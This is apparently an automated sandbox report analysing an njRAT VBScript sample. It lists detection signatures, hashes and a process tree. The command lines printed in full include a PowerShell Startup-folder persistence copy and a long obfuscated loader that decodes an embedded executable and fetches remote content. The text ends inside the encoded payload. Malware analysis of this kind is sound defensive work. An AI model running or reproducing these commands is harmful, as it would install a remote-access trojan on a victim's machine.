Edit tour

Windows Analysis Report
NJratccccassssG2.00.vbs

Overview

General Information

Sample Name:	NJratccccassssG2.00.vbs
Analysis ID:	575468
MD5:	4833452ece935ea45c3b0912db2fc0bd
SHA1:	111ba6889be1031376e62b1e87dd83041ace2352
SHA256:	965b43f6e33c4b12172f54bd6361f892a3c7f8aa6d75ac3a8665b090ff9d819f
Infos:

Detection

Njrat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

VBScript performs obfuscated calls to suspicious functions

Yara detected Njrat

Antivirus detection for URL or domain

Sigma detected: Encoded FromBase64String

Multi AV Scanner detection for domain / URL

Sigma detected: Drops script at startup location

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Sigma detected: FromBase64String Command Line

Sigma detected: Suspicious Encoded PowerShell Command Line

.NET source code references suspicious native API functions

Contains functionality to log keystrokes (.Net Source)

Very long command line found

Suspicious powershell command line found

Uses ping.exe to check the status of other devices and networks

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Uses ping.exe to sleep

Sigma detected: Suspicious PowerShell Cmdline

Obfuscated command line found

C2 URLs / IPs found in malware configuration

Drops VBS files to the startup folder

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Java / VBScript file with very long strings (likely obfuscated code)

Detected TCP or UDP traffic on non-standard ports

Contains functionality to detect virtual machines (SLDT)

Creates a start menu entry (Start Menu\Programs\Startup)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

System is w10x64

wscript.exe (PID: 6576 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\NJratccccassssG2.00.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

cmd.exe (PID: 4560 cmdline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs') MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 4960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 3732 cmdline: ping 127.0.0.1 -n 10 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)

powershell.exe (PID: 6844 cmdline: powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs') MD5: 95000560239032BC68B4C2FDFCDEF913)

powershell.exe (PID: 5608 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B4CKBc?? ?? ?? oqHgIoG?? ?? ?? Ciqmcxk?? ?? ?? q?? ?? Q?? ?? BHMa?? ?? ?? Kg?? I?? ?? ?? RzGw?? ?? Co?? D?? ?? ?? Ecxw?? ?? ?? q?? B?? ?? ?? BCoufgE?? ?? ?? RvHQ?? ?? CioufgI?? ?? ?? RvHg?? ?? CioufgM?? ?? ?? RvHw?? ?? CioufgQ?? ?? ?? RvI?? ?? ?? CirGfgU?? ?? ?? QUKCE?? ?? ?? osHnIB?? ?? Bw0?? U?? ?? ?? IoIg?? ?? Cm8j?? ?? ?? KcyQ?? ?? ?? q?? BQ?? ?? BH4F?? ?? ?? EKhp+Bg?? ?? BCoe?? o?? G?? ?? ?? EKlZzD?? ?? ?? Bigl?? ?? ?? Kd?? Y?? ?? ?? K?? Bw?? ?? BCoe?? igm?? ?? ?? KKhp+Bw?? ?? BCoaK?? 0?? ?? ?? YqHgIoJw?? ?? Cio?? Ez?? H?? Lc?? ?? ?? ?? B?? ?? ?? Rcic?? ?? H?? Kcyg?? ?? ?? olKCk?? ?? ?? pvKg?? ?? CgYoKw?? ?? Cm8s?? ?? ?? KCwcoKw?? ?? CgsHcn8?? ?? HByhQ?? ?? cG8t?? ?? ?? KC3Mo?? ?? ?? K?? igr?? ?? ?? KKCw?? ?? ?? oMCCgr?? ?? ?? KDHKJ?? ?? BwKCs?? ?? ?? oNCXLP?? ?? BwKCs?? ?? ?? ooLg?? ?? Cg0oLw?? ?? CgcoM?? ?? ?? Cm8x?? ?? ?? Kcuc?? ?? HBvMg?? ?? CnIL?? QBwbzM?? ?? ?? oUGI0X?? ?? ?? BJRYJch0B?? H?? oLg?? ?? CqIlFwgoM?? ?? ?? CqJvN?? ?? ?? CiYqNgIDKDU?? ?? ?? ooNg?? ?? Cioe?? ig3?? ?? ?? KKi7QCQ?? ?? ?? igi?? ?? ?? KKh4CKDg?? ?? ?? oq?? ?? ?? ?? Ez?? B?? BQ?? ?? ?? ?? C?? ?? ?? R?? owF?? ?? ?? bLQgo?? Q?? ?? Kwor?? gIKBioi?? /4VBQ?? ?? Gyoe?? ign?? ?? ?? KKg?? ?? ?? BMw?? g?? o?? ?? ?? ?? ?? w?? ?? EQJ7Og?? ?? Cm87?? ?? ?? KCgaMC?? ?? ?? Gy0SK?? I?? ?? CsK?? ns6?? ?? ?? KBm88?? ?? ?? KBipK?? ign?? ?? ?? K?? nM9?? ?? ?? KfTo?? ?? ?? oq?? EJTSkIB?? ?? E?? ?? ?? ?? ?? ?? ?? w?? ?? ?? B2NC4wLjMwMzE5?? ?? ?? ?? ?? ?? U?? b?? ?? ?? ?? MwH?? ?? ?? jfg?? ?? O?? g?? ?? BQI?? ?? ?? jU3RyaW5ncw?? ?? ?? ?? BME?? ?? ?? O?? E?? ?? CNVUwCEEQ?? ?? E?? ?? ?? ?? CNHVUlE?? ?? ?? ?? lBE?? ?? CQE?? ?? ?? jQmxvYg?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? BVxWiCQkP?? ?? ?? ?? +gEz?? BY?? ?? ?? E?? ?? ?? ?? u?? ?? ?? ?? Cg?? ?? ?? ?? g?? ?? ?? ?? Z?? ?? ?? ?? BQ?? ?? ?? D0?? ?? ?? B?? ?? ?? ?? ?? ?? w?? ?? ?? ?? U?? ?? ?? ?? J?? ?? ?? ?? Cg?? ?? ?? ?? g?? ?? ?? ?? B?? ?? ?? ?? ?? w?? ?? ?? ?? E?? ?? ?? ?? C?? ?? ?? ?? ?? w?? ?? ?? ?? I?? ?? ?? ?? ?? ?? IkE?? Q?? ?? ?? ?? ?? ?? BgBC?? 98GBgCv?? 98GBg?? Z?? i?? GDwBDBw?? ?? BgBa?? ioFBg?? l?? yoFBgCW?? yoFBgBi?? yoFBgB7?? yoFBgCh?? ioFBgBG?? pkGBgDC?? ZkGBgDt?? ioFBgC8?? gYECgDl?? d?? FCgCS?? XMECg?? t?? nMEDgBf?? W8GDg?? ?? BjMGBgDV?? i?? GDgBx?? rgGDgCJ?? ns?? BgCYB5YEDgDsBW8GDg?? K?? 3s?? Bg?? n?? ZYEDg?? B?? EkECgDQ?? akEBgD8?? S?? GBgCn?? d8GBgD?? Bf8GBgBHBRUFCgBv?? Q?? FBg?? ?? ?? ZYEBgD4ByoFCgB6?? Q?? FCgD?? B6kHBgD9?? 9IHDgBSB3s?? BgBCBJYEBgDGBJYEBgDKB5YEBg?? 8BSoFBgBU?? SoFBgCCB98GBg?? JBpYE?? ?? ?? ?? ?? Dc?? ?? ?? ?? ?? ?? ?? E?? ?? Q?? ?? ?? ?? ?? ?? 8gToB0k?? ?? Q?? B?? ?? ?? ?? ?? ?? D+BegHTQ?? B?? ?? I?? ?? ?? EQ?? J8H6?? dd?? ?? E?? ?? w?? ?? ?? Q?? ?? H?? cQB10?? BQ?? I?? ?? ?? BE?? BnB+gHhQ?? H?? ?? s?? ?? ?? E?? ?? ?? EI6?? dd?? ?? g?? Dg?? B?? ?? ?? ?? 8?? NTBV0?? C?? ?? P?? ?? UB?? ?? BhBg?? ?? XQ?? I?? BE?? BQE?? ?? B?? ?? ?? ?? Bd?? ?? g?? G?? ?? x?? IUFJgEx?? FwFLgEx?? H?? FNgEx?? J4FPgER?? J0ERgER?? EQBSgER?? NQ?? TwEh?? N4H9wBQI?? ?? ?? ?? ?? ?? GGBMGBg?? B?? Fgg?? ?? ?? ?? ?? ?? YYEwYG?? ?? E?? YC?? ?? ?? ?? ?? ?? ERgZBlMB?? QCKI?? ?? ?? ?? ?? ?? TCPEFVwEB?? JYg?? ?? ?? ?? ?? BMI4gRc?? QE?? oi?? ?? ?? ?? ?? ?? EwjoBWEB?? QCuI?? ?? ?? ?? ?? ?? TCFEGZgEB?? Log?? ?? ?? ?? ?? BMIv?? Vr?? QE?? 7C?? ?? ?? ?? ?? ?? Ewgs?? X?? B?? QDzI?? ?? ?? ?? ?? ?? TCDgBdgEB?? Psg?? ?? ?? ?? ?? BEYGQZT?? QI?? ESE?? ?? ?? ?? ?? BhgTBgY?? ?? g?? ZIQ?? ?? ?? ?? ?? WCLQHfQEC?? C?? h?? ?? ?? ?? ?? BMIWgd9?? QI?? JyE?? ?? ?? ?? ?? BhgTBgY?? ?? g?? wIQ?? ?? ?? ?? ?? W?? Gk?? ggEC?? PMh?? ?? ?? ?? ?? MYCewfL?? ?? M?? ?? SI?? ?? ?? ?? ?? xgLt?? N?? ?? B?? ?? JIg?? ?? ?? ?? CD?? CQBhwEE?? BUi?? ?? ?? ?? ?? MYCQ?? TU?? ?? Q?? ICI?? ?? ?? ?? ?? EQBW?? IwBB?? B?? Ig?? ?? ?? ?? ?? B?? EI?? l?? EF?? Eki?? ?? ?? ?? ?? ?? YYEwYG?? ?? Y?? VCI?? ?? ?? ?? ?? ?? wjE?? Eo?? BgCIIg?? ?? ?? ?? ?? GGBMGBg?? G?? ?? ?? ?? ?? QDq?? w?? ?? ?? Q?? r?? ?? ?? ?? ?? QBRBQ?? ?? ?? QDk?? ?? ?? ?? ?? QDk?? ?? k?? EwYB?? BE?? EwYG?? Bk?? EwYK?? Ck?? EwYQ?? DE?? EwYQ?? Dk?? EwYQ?? EE?? EwYQ?? Ek?? EwYQ?? FE?? EwYQ?? Fk?? EwYV?? GE?? EwYQ?? Gk?? EwYQ?? HE?? EwYQ?? Hk?? EwYa?? Ik?? EwYg?? KE?? EwYG?? Kk?? EwYG?? LE?? EwYG?? Mk?? EwYm?? OE?? EwYQ?? Ok?? EwYG?? PE?? EwYG?? JE?? EwYG?? Jk?? EwYG?? ?? w?? EwYG?? BQ?? EwYG?? Bw?? EwYG?? CQ?? EwYG?? ?? w?? x?? BK?? BQ?? x?? BK?? Bw?? x?? BK?? CQ?? x?? BK?? Lk?? cgdP?? NE?? EgFV?? NE?? 9?? dd?? Pk?? EwZj?? CEBlgBr?? ?? kBEwYG?? Lk?? EwYG?? CkBEwYG?? DEBLgB7?? CkB+QOB?? DkBhwGI?? CkBMQSN?? EEBrQCS?? EEBkQeY?? EkB0?? Se?? FEBI?? Sk?? EkBkQCq?? BkBJ?? Gy?? NE?? owC4?? GEB+QC/?? GkB4QPG?? Lk?? ewfL?? Lk?? 7QDQ?? Lk?? Q?? TU?? HEBtQDg?? DQ?? 3gf3?? Dw?? zQNK?? Dw?? 1wMO?? Tw?? EwYG?? Ck?? owDM?? y4?? CwDF?? S4?? EwDO?? S4?? GwDt?? S4?? IwD2?? S4?? KwD2?? S4?? MwD2?? S4?? OwD2?? S4?? Qw?? E?? i4?? Sw?? c?? i4?? Uw?? c?? i4?? Ww?? i?? i4?? YwBM?? i4?? awBZ?? k?? ?? gwCn?? k?? ?? ewCs?? kM?? cwC1?? kM?? ewCs?? kk?? owDd?? 2M?? cwC1?? mM?? ewCs?? mk?? owDx?? 4?? ?? gwCn?? oM?? iwCn?? oM?? kwCn?? oM?? cwC1?? ok?? owD+?? 6?? ?? gwCn?? qM?? iwCn?? qM?? cwDO?? qM?? qwCn?? qM?? swCn?? qM?? kwCn?? qk?? ewDt?? c?? ?? gwCn?? sM?? swCn?? sM?? cw?? Q?? 8M?? ewDt?? ck?? ewDt?? e?? ?? gwCn?? uM?? iwCn?? uM?? kwCn?? uM?? qwCn?? uM?? swCn?? gkBow?? SBCMBewCs?? iMBmwBq?? 0MBewCs?? kMBUw?? c?? i?? CewCs?? i?? CgwCn?? k?? CewCs?? k?? CgwCn?? m?? CewCs?? m?? CgwCn?? o?? CewCs?? o?? CgwCn?? q?? CgwCn?? s?? CgwCn?? u?? CgwCn?? u?? CewCs?? g?? DgwCn?? i?? DgwCn?? i?? DewCs?? nQ?? 2?? Dr?? ?? Q?? ?? Q?? F?? ?? U?? Bg?? H?? ?? c?? C?? ?? K?? ?? k?? ?? ?? ?? ?? BpwB?? ?? D0BKEB?? ?? DsBaYB?? ?? BjBqsB?? ?? D?? Bb?? B?? ?? BM?? bUB?? ?? C4B7sB?? ?? BpB7sB?? ?? DI?? M?? B?? g?? E?? ?? M?? ?? g?? F?? ?? U?? ?? g?? G?? ?? c?? ?? g?? H?? ?? k?? ?? g?? I?? ?? s?? ?? g?? J?? ?? 0?? ?? Q?? K?? ?? 0?? ?? g?? N?? ?? 8?? ?? g?? O?? BE?? ?? g?? Y?? BM?? Lg?? 1?? Dw?? QwDd?? P?? ?? /w?? G?? QS?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FMF?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? U?? XI?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? BQBlgQ?? ?? ?? ?? ?? Cg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? HQF7?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? CYH?? ?? ?? J?? ?? Q?? Cg?? E?? ?? ?? ?? E?? ?? U?? E?? ?? ?? ?? ?? Q?? Cs?? Q?? ?? ?? ?? ?? ?? ?? LQB?? ?? HM?? 5gBz?? ?? kB?? ?? ?? ?? Q29udGV4dFZhbHVlYDE?? VGhyZWFkU2FmZU9iamVjdFByb3ZpZGVyYDE?? XzU?? Z2V0X1VURjg?? PE1vZHVsZT4?? V?? BEaXNwb3NlX19JbnN0YW5jZV9f?? ENyZWF0ZV9fSW5zdGFuY2VfXwBVRHNTaURiYgBtc2NvcmxpYgBNaWNyb3NvZnQuVmlzdWFsQmFzaWM?? TG9hZ?? BTeW5jaHJvbml6ZWQ?? R2V0TWV0aG9k?? FJlcGxhY2U?? Q3JlYXRlSW5zdGFuY2U?? Z2V0X0dldEluc3RhbmNl?? GRlZmF1bHRJbnN0YW5jZQBpbnN0YW5jZQBHZXRIYXNoQ29kZQBJbnZva2U?? UnVudGltZVR5cGVIYW5kbGU?? R2V0VHlwZUZyb21IYW5kbGU?? R2V0VHlwZQBnZXRfQ3VsdHVyZQBzZXRfQ3VsdHVyZQByZXNvdXJjZUN1bHR1cmU?? TWV0aG9kQmFzZQBBcHBsaWNhdGlvbkJhc2U?? QXBwbGljYXRpb25TZXR0aW5nc0Jhc2U?? U3RyUmV2ZXJzZQBFZGl0b3JCcm93c2FibGVTdGF0ZQBDb21waWxlckdlbmVyYXRlZEF0dHJpYnV0ZQBHdWlkQXR0cmlidXRl?? EhlbHBLZXl3b3JkQXR0cmlidXRl?? EdlbmVyYXRlZENvZGVBdHRyaWJ1dGU?? RGVidWdnZXJOb25Vc2VyQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRl?? EVkaXRvckJyb3dzYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRl?? EFzc2VtYmx5VGl0bGVBdHRyaWJ1dGU?? U3RhbmRhcmRNb2R1bGVBdHRyaWJ1dGU?? SGlkZU1vZHVsZU5hbWVBdHRyaWJ1dGU?? QXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGU?? VGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRl?? ERlYnVnZ2VySGlkZGVuQXR0cmlidXRl?? EFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGU?? TXlHcm91cENvbGxlY3Rpb25BdHRyaWJ1dGU?? QXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRl?? EFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGU?? UnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGU?? Z2V0X1ZhbHVl?? HNldF9WYWx1ZQBHZXRPYmplY3RWYWx1ZQBVR2x5bXpVZwBzZXRfRW5jb2Rpbmc?? U3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBGcm9tQmFzZTY0U3RyaW5n?? ERvd25sb2FkU3RyaW5n?? FRvU3RyaW5n?? E1pY3Jvc29mdC5WaXN1YWxCYXNpYy5NeVNlcnZpY2VzLkludGVybmFs?? FN5c3RlbS5Db21wb25lbnRNb2Rlb?? BscE9VcGxNcC5kbGw?? U3lzdGVt?? HJlc291cmNlTWFu?? FN5c3RlbS5Db21wb25lbnRNb2RlbC5EZXNpZ24?? QXBwRG9tYWlu?? GdldF9DdXJyZW50RG9tYWlu?? GdldF9BcHBsaWNhdGlvbgBNeUFwcGxpY2F0aW9u?? FN5c3RlbS5Db25maWd1cmF0aW9u?? FN5c3RlbS5HbG9iYWxpemF0aW9u?? FN5c3RlbS5SZWZsZWN0aW9u?? E1ldGhvZEluZm8?? Q3VsdHVyZUluZm8?? bHBPVXBsTX?? ?? bV9BcHBPYmplY3RQcm92aWRlcgBtX1VzZXJPYmplY3RQcm92aWRlcgBtX0NvbXB1dGVyT2JqZWN0UHJvdmlkZXI?? bV9NeVdlYlNlcnZpY2VzT2JqZWN0UHJvdmlkZXI?? Z2V0X1Jlc291cmNlTWFuYWdlcgBTeXN0ZW0uQ29kZURvbS5Db21waWxlcgBnZXRfVXNlcgBnZXRfQ29tcHV0ZXI?? TXlDb21wdXRlcgBBY3RpdmF0b3I?? LmN0b3I?? LmNjdG9y?? FN5c3RlbS5EaWFnbm9zdGljcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuRGV2aWNlcwBnZXRfV2ViU2VydmljZXM?? TXlXZWJTZXJ2aWNlcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQXBwbGljYXRpb25TZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM?? TWljcm9zb2Z0LlZpc3VhbEJhc2ljLkNvbXBpbGVyU2VydmljZXM?? U3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBTeXN0ZW0uUmVzb3VyY2Vz?? GxwT1VwbE1wLk15LlJlc291cmNlcwBscE9VcGxNcC5SZXNvdXJjZXMucmVzb3VyY2Vz?? ERlYnVnZ2luZ01vZGVz?? FN0cmluZ3M?? Z2V0X1NldHRpbmdz?? E15U2V0dGluZ3M?? UmVmZXJlbmNlRXF1YWxz?? FJ1bnRpbWVIZWxwZXJz?? ENvbmNhd?? BPYmplY3Q?? TXlQcm9qZWN0?? FN5c3RlbS5OZXQ?? Z2V0X0RlZmF1bHQ?? V2ViQ2xpZW50?? ENvbnZlcnQ?? U3lzdGVtLlRleHQ?? bV9Db250ZXh0?? GxwT1VwbE1wLk15?? GdldF9Bc3NlbWJseQBNeVNldHRpbmdzUHJvcGVydHk?? ?? CVs?? H?? ?? TwBV?? H?? ?? b?? BN?? H?? ?? LgBS?? GU?? cwBv?? HU?? cgBj?? GU?? cw?? ?? V3Q?? e?? B0?? C4?? N?? ?? v?? H?? ?? bQB1?? HI?? Lw?? x?? DU?? Mg?? u?? Dc?? Nw?? x?? C4?? M?? ?? 1?? C4?? O?? ?? 5?? DE?? Q?? Bu?? G8?? d?? Bj?? GU?? d?? Bl?? GQ?? bwBu?? C8?? Lw?? 6?? H?? ?? d?? B0?? Gg?? ?? ?? VIJhEm?? QNB?? ?? BFawBy?? G8?? dwBl?? G0?? YQBy?? EY?? X?? BU?? EU?? Tg?? u?? HQ?? ZgBv?? HM?? bwBy?? GM?? aQBN?? Fw?? cwB3?? G8?? Z?? Bu?? Gk?? VwBc?? Do?? Qw?? ?? Fzk?? MQ?? z?? D?? ?? Mw?? u?? D?? ?? Lg?? 0?? HY?? X?? ?? ?? I2o?? SQBD?? HU?? Z?? BI?? E8?? T?? ?? u?? Ec?? WgBu?? G4?? SwBv?? Fc?? Yw?? ?? EXo?? egBH?? HY?? d?? Bw?? GI?? bw?? ?? GVw?? UgBl?? Gc?? UwB2?? GM?? cw?? u?? GU?? e?? Bl?? ?? ?? ?? hFFgqWcwdE6wlnV8YWFE?? g?? EI?? EBC?? Mg?? ?? EFI?? EBEREEI?? EBDgQg?? QECBS?? C?? Q4OBS?? B?? RFBBy?? E?? Q4ODg4GFRIo?? RIMBhUSK?? ESC?? YVEigBEmEGFRIo?? RIkBC?? ?? Ew?? F?? ?? ICHBwH?? ?? ESaRG?? iQUg?? BK?? jQcg?? gEOEoCNC?? ?? BEoCREoCRBgcEDg4ODgU?? ?? BK?? mQYg?? QESgJkE?? ?? EODgQg?? Q4OBS?? CDg4OBQ?? CDg4OBQ?? ?? EoClBQ?? BHQUOBy?? BEoCNHQUFI?? ESaQ4GI?? ESgK0OBi?? CHBwdH?? Q?? ?? RwcBC?? B?? hwDI?? ?? I?? y?? ?? DgQH?? R4?? ?? h4?? BR?? B?? B4?? B?? oBHg?? EBwET?? ?? YVEigBEw?? HBhUSbQET?? ?? YVEm0BEw?? CEw?? ECgET?? ?? Ug?? QET?? ?? i3elxWGTTgiQiwP19/EdUKOgcGFRIo?? RIMBwYVEigBEggHBhUSK?? ESYQcGFRIo?? RIk?? wYSfQQGEoCB?? wYSG?? M?? ?? ?? EE?? ?? ?? SD?? Q?? ?? BIIB?? ?? ?? EmEE?? ?? ?? SJ?? Q?? ?? BJ9BQ?? ?? EoCBBg?? B?? RK?? gQQ?? ?? BIYB?? ?? B?? Q4EI?? ?? SaQcQ?? QEe?? B4?? Bz?? B?? QEQHg?? EC?? ?? SD?? QI?? BIIB?? g?? EmEEC?? ?? SJ?? QI?? BJ9BQg?? EoCBB?? g?? EhgEK?? ?? T?? ?? gB?? ?? g?? ?? ?? ?? ?? ?? B4B?? ?? E?? V?? IWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEI?? Q?? C?? ?? ?? ?? ?? ?? ?? N?? Q?? IbHBPVXBsTX?? ?? ?? BcB?? BJDb3B5cmlnaHQgwqkgIDIwMjI?? ?? ?? UB?? ?? ?? ?? ?? CkB?? CRhMTU5NDFlMy03ZDM4LTQwYmEtYmI5MC1mYTE5YTZjNjg1NmI?? ?? ?? wB?? ?? cxLj?? uMC4w?? ?? BN?? Q?? cLk5FVEZyYW1ld29yayxWZXJzaW9uPXY0LjUuMQE?? V?? 4URnJhbWV3b3JrRGlzcGxheU5hbWUULk5FVCBGcmFtZXdvcmsgNC41LjEE?? Q?? ?? ?? ?? gB?? ?? E?? ?? ?? ?? ?? ?? BgB?? ?? pNeVRlbXBsYXRlCDExLj?? uMC4w?? ?? BB?? Q?? zU3lzdGVtLlJlc291cmNlcy5Ub29scy5TdHJvbmdseVR5cGVkUmVzb3VyY2VCdWlsZGVyCDE3Lj?? 